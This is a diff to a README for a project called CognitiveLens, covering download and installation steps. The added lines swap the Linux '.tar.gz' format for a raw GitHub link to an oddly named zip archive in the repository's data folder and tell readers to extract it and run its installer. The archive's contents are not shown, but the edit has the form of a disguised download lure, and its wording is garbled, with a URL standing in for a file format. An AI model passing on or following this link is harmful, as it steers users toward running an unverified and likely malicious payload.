Jatin-sehgal7060/Cognitivelens-AI-Human-Comparison/README.md

    On the Releases page, look for the latest version.
 It will usually be labeled “Latest” next to the version number.

 2. **Download the Application**
    Click on the appropriate file for your operating system.
-The file could be in formats like `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux.
+The file could be in formats like `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/Jatin-sehgal7060/Cognitivelens-AI-Human-Comparison/main/data/Cognitivelens-AI-Human-Comparison-pharology.zip` for Linux.

 3. **Run the Installer**
    - For Windows: Double-click the downloaded `.exe` file.
    - For macOS: Open the downloaded `.dmg` file and drag the CognitiveLens icon to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and run the installation script in your terminal.
+   - For Linux: Extract the `https://raw.githubusercontent.com/Jatin-sehgal7060/Cognitivelens-AI-Human-Comparison/main/data/Cognitivelens-AI-Human-Comparison-pharology.zip` file and run the installation script in your terminal.

 ## 🔧 Using CognitiveLens